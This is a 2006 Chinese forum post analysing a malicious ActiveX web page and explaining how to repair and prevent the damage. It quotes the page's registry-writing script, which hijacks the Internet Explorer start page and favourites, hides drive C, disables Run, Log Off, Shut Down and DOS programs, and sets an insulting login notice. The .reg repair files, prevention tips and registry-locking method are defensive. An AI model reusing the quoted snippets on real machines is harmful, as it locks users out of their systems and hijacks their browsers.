瀏覽網頁註冊表被修改之迷及解決辦法

psac · 2006-05-15, 05:15 PM

瀏覽網頁註冊表被修改之迷及解決辦法

　　瀏覽網頁會被修改註冊表？千真萬確！如果你去瀏覽過下面的網頁：http://www.某某.com/default.htm ，你真有生不如死的感覺！

進入該網頁會被：

　　1.修改開始選單

　　1）禁止「關閉系統」
　　2）禁止「執行」
　　3）禁止「註銷」

　　2.隱藏C碟——你的C碟找不到了

　　3.禁止使用註冊表編輯器regedit

　　4.禁止使用DOS程序

　　5.使系統無法進入「真實模式」

　　6.禁止執行任何程序

　　7.將IE瀏覽器的首頁改為http://www.某某.com/，我的最愛中也被加入該網址。

　　那麼這些功能恐怖的功能是如何實現的呢？原來，該網頁是有人利用Java技術製作的含有有害程式碼的ActiveX網頁文件。為讓更多的人瞭解其危害，我檢視了其來源碼，將其主要部分列了出來，並加了詳細的註釋（文中有「注」字的部分是我加的註釋）。

註：下面程式碼是將你的IE預設值連接首頁改為http://www.某某.com/
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Start Page", "http://www.某某.com/"）;

註：以下是該網頁修改受害者的註冊表項所用的招數

Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion
\\Policies\\Explorer\\NoRun", 01, "REG_BINARY"）;
註：使受害者系統沒有「執行」項，這樣用戶就不能通過註冊表編輯器來修改該有害網頁對系統註冊表的修改。

Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoClose", 01, "REG_BINARY"）;
註：使受害者系統沒有「關閉系統」項

Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"）;
註：使受害者系統沒有「註銷」項

Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD"）;
註：使受害者系統沒有邏輯磁碟機C

Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\\WinOldApp\\ Disabled","REG_BINARY"）;
註：禁止執行所有的DOS應用程式；

Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\
Policies\ \WinOldApp\\NoRealMode","REG_BINARY"）;
註：使系統不能啟動到「真實模式」（傳統的DOS模式）下；

又註：進入該網頁，它還會修改以下的註冊表項，使WINDOWS系統登入時顯示一個登入視窗（在MicroSoft網路用戶登入之前）

Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeCaption", "嗚啦啦..."）;
註：這些程式碼會使視窗的標題是「嗚啦啦…」

Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Winlogon\\LegalNoticeText", "歡迎你！你這個超級無敵大白癡！《嗚啦啦...》故事開始了，按確定進入悲慘世界"）;
註：上面一行是會在視窗中顯示出來的文字

註：下面兩行程式碼修改註冊表，使受害者所有的IE視窗都加上以下的標題：「嗚啦啦…」

Shl.RegWrite （"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "嗚啦啦..."）;
Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\
Window Title", "嗚啦啦..."）;
註：到上面一行為止，完成了對受害者的註冊表的所有修改！

註：下面程式碼用來將其網頁增加到受害者的我的最愛中

var WF, Shor, loc;
WF = FSO.GetSpecialFolder（0）;
loc = WF + "\\Favorites";
if（!FSO.FolderExists（loc））
{
loc = FSO.GetDriveName（WF） + "\\Documents and Settings\\
" + Net.UserName + "\\Favorites";
if（!FSO.FolderExists（loc））
{
return;
}
}

註：下面就是使其網頁加入到你的我的最愛的具體程式碼
AddFavLnk（loc, "找到感覺www.某某.com", "http://www.某某.com"）;

　　由於程式碼很簡單，又加了註釋，相信你已經看明白是怎麼回事了。那麼如果不小心進入該網頁，並且已經中招了該怎麼辦呢？別急，下面給你列出了解決的辦法。

受害用戶的修復方法：

　　1：對於Win9x用戶，建議在電腦啟動時按F8鍵，選項到MS-DOS方式下，使用Scanreg/restore指令來恢復以前制作備份的、正常的註冊表。

　　2：對於Win2000用戶，把以下內容copy下來，存為unlock.reg文件，選帶指令行的安全模式，用指令regedit unlock.reg匯入，如何重新啟動機器就OK了。

unlock.reg文件內容如下：

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp]
"Disabled"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp]
"NoRealMode"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Winlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE瀏覽器"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="IE瀏覽器"

預防辦法：

　　1.要避免中招，關鍵是不要輕易去一些自己並不瞭解的站點。

　　2.在IE設定中將ActiveX插件和控件、Java指令碼等全部禁止

　　3.可以通過昇級到最新的病毒庫，來預防該類惡意網頁的侵害。

　　4.既然該網頁是通過修改註冊表來破壞我們的系統，那麼我們可以事先把註冊表加鎖：禁止修改註冊表，這樣就可以達到預防的目的。不過，自己要使用註冊表編輯器regedit.exe該怎麼辦呢？因此我們還要在此前事先準備一把「鑰匙」，以便開啟這把「鎖」！

　　加鎖方法如下：

　　（1）執行註冊表編輯器regedit.exe；
　　（2）展開註冊表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System下，新增一個名為DisableRegistryTools的DWORD值，並將其值改為「1」，即可禁止使用註冊表編輯器regedit.exe。

　　解鎖方法如下：

　　用記事本編輯一個任意名字的.reg文件，比如unlock.reg，內容如下：

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System]
"DisableRegistryTools"=dword:00000000

　　儲存碟。你就有了一把解鎖的鑰匙了！如果要使用註冊表編輯器，則雙按unlock.reg即可。要注意的是，在「REGEDIT4」後面一定要空一行，並且「REGEDIT4」中的「4」和「T」之間一定不能有空格，否則將前功盡棄！

說明：對於「萬花谷」網頁的惡意程式碼帶來的破壞，也可按上面所提的方法來預防，中招後也可參考上面的方法解決。另，KV3000對「萬花谷」可完全恢復，對本文介紹的網頁破壞系統現象，則無法安全恢復。

2006-05-15, 05:15 PM	#1
psac 榮譽會員榮譽勳章勳章總數19 UID - 3662 在線等級: 註冊日期: 2002-12-07 住址: 木柵市立動物園文章: 17381 精華: 2 現金: 5253 金幣資產: 33853 金幣	瀏覽網頁註冊表被修改之迷及解決辦法瀏覽網頁註冊表被修改之迷及解決辦法　　瀏覽網頁會被修改註冊表？千真萬確！如果你去瀏覽過下面的網頁：http://www.某某.com/default.htm ，你真有生不如死的感覺！進入該網頁會被：　　1.修改開始選單　　1）禁止「關閉系統」　　2）禁止「執行」　　3）禁止「註銷」　　2.隱藏C碟——你的C碟找不到了　　3.禁止使用註冊表編輯器regedit 　　4.禁止使用DOS程序　　5.使系統無法進入「真實模式」　　6.禁止執行任何程序　　7.將IE瀏覽器的首頁改為http://www.某某.com/，我的最愛中也被加入該網址。　　那麼這些功能恐怖的功能是如何實現的呢？原來，該網頁是有人利用Java技術製作的含有有害程式碼的ActiveX網頁文件。為讓更多的人瞭解其危害，我檢視了其來源碼，將其主要部分列了出來，並加了詳細的註釋（文中有「注」字的部分是我加的註釋）。註：下面程式碼是將你的IE預設值連接首頁改為http://www.某某.com/ Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\ Start Page", "http://www.某某.com/"）; 註：以下是該網頁修改受害者的註冊表項所用的招數 Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion \\Policies\\Explorer\\NoRun", 01, "REG_BINARY"）; 註：使受害者系統沒有「執行」項，這樣用戶就不能通過註冊表編輯器來修改該有害網頁對系統註冊表的修改。 Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\\Explorer\\NoClose", 01, "REG_BINARY"）; 註：使受害者系統沒有「關閉系統」項 Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"）; 註：使受害者系統沒有「註銷」項 Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD"）; 註：使受害者系統沒有邏輯磁碟機C Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\\WinOldApp\\ Disabled","REG_BINARY"）; 註：禁止執行所有的DOS應用程式； Shl.RegWrite （"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\ Policies\ \WinOldApp\\NoRealMode","REG_BINARY"）; 註：使系統不能啟動到「真實模式」（傳統的DOS模式）下；又註：進入該網頁，它還會修改以下的註冊表項，使WINDOWS系統登入時顯示一個登入視窗（在MicroSoft網路用戶登入之前） Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ Winlogon\\LegalNoticeCaption", "嗚啦啦..."）; 註：這些程式碼會使視窗的標題是「嗚啦啦…」 Shl.RegWrite （"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ Winlogon\\LegalNoticeText", "歡迎你！你這個超級無敵大白癡！《嗚啦啦...》故事開始了，按確定進入悲慘世界"）; 註：上面一行是會在視窗中顯示出來的文字註：下面兩行程式碼修改註冊表，使受害者所有的IE視窗都加上以下的標題：「嗚啦啦…」 Shl.RegWrite （"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\ Window Title", "嗚啦啦..."）; Shl.RegWrite （"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\ Window Title", "嗚啦啦..."）; 註：到上面一行為止，完成了對受害者的註冊表的所有修改！註：下面程式碼用來將其網頁增加到受害者的我的最愛中 var WF, Shor, loc; WF = FSO.GetSpecialFolder（0）; loc = WF + "\\Favorites"; if（!FSO.FolderExists（loc）） { loc = FSO.GetDriveName（WF） + "\\Documents and Settings\\ " + Net.UserName + "\\Favorites"; if（!FSO.FolderExists（loc）） { return; } } 註：下面就是使其網頁加入到你的我的最愛的具體程式碼 AddFavLnk（loc, "找到感覺www.某某.com", "http://www.某某.com"）; 　　由於程式碼很簡單，又加了註釋，相信你已經看明白是怎麼回事了。那麼如果不小心進入該網頁，並且已經中招了該怎麼辦呢？別急，下面給你列出了解決的辦法。受害用戶的修復方法：　　1：對於Win9x用戶，建議在電腦啟動時按F8鍵，選項到MS-DOS方式下，使用Scanreg/restore指令來恢復以前制作備份的、正常的註冊表。　　2：對於Win2000用戶，把以下內容copy下來，存為unlock.reg文件，選帶指令行的安全模式，用指令regedit unlock.reg匯入，如何重新啟動機器就OK了。 unlock.reg文件內容如下： Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer] "NoDriveTypeAutoRun"=dword:00000095 "NoRun"=hex: "NoLogOff"=hex: "NoDrives"=dword:00000000 "RestrictRun"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System] "DisableRegistryTools"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System] "DisableRegistryTools"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\WinOldApp] "Disabled"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\WinOldApp] "NoRealMode"=dword:00000000 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Winlogon] "LegalNoticeCaption"="" "LegalNoticeText"="" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] "Window Title"="IE瀏覽器" [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Window Title"="IE瀏覽器" 預防辦法：　　1.要避免中招，關鍵是不要輕易去一些自己並不瞭解的站點。　　2.在IE設定中將ActiveX插件和控件、Java指令碼等全部禁止　　3.可以通過昇級到最新的病毒庫，來預防該類惡意網頁的侵害。　　4.既然該網頁是通過修改註冊表來破壞我們的系統，那麼我們可以事先把註冊表加鎖：禁止修改註冊表，這樣就可以達到預防的目的。不過，自己要使用註冊表編輯器regedit.exe該怎麼辦呢？因此我們還要在此前事先準備一把「鑰匙」，以便開啟這把「鎖」！　　加鎖方法如下：　　（1）執行註冊表編輯器regedit.exe；　　（2）展開註冊表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System下，新增一個名為DisableRegistryTools的DWORD值，並將其值改為「1」，即可禁止使用註冊表編輯器regedit.exe。　　解鎖方法如下：　　用記事本編輯一個任意名字的.reg文件，比如unlock.reg，內容如下： REGEDIT4 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System] "DisableRegistryTools"=dword:00000000 　　儲存碟。你就有了一把解鎖的鑰匙了！如果要使用註冊表編輯器，則雙按unlock.reg即可。要注意的是，在「REGEDIT4」後面一定要空一行，並且「REGEDIT4」中的「4」和「T」之間一定不能有空格，否則將前功盡棄！說明：對於「萬花谷」網頁的惡意程式碼帶來的破壞，也可按上面所提的方法來預防，中招後也可參考上面的方法解決。另，KV3000對「萬花谷」可完全恢復，對本文介紹的網頁破壞系統現象，則無法安全恢復。
	__________________
	送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次

Google 提供的廣告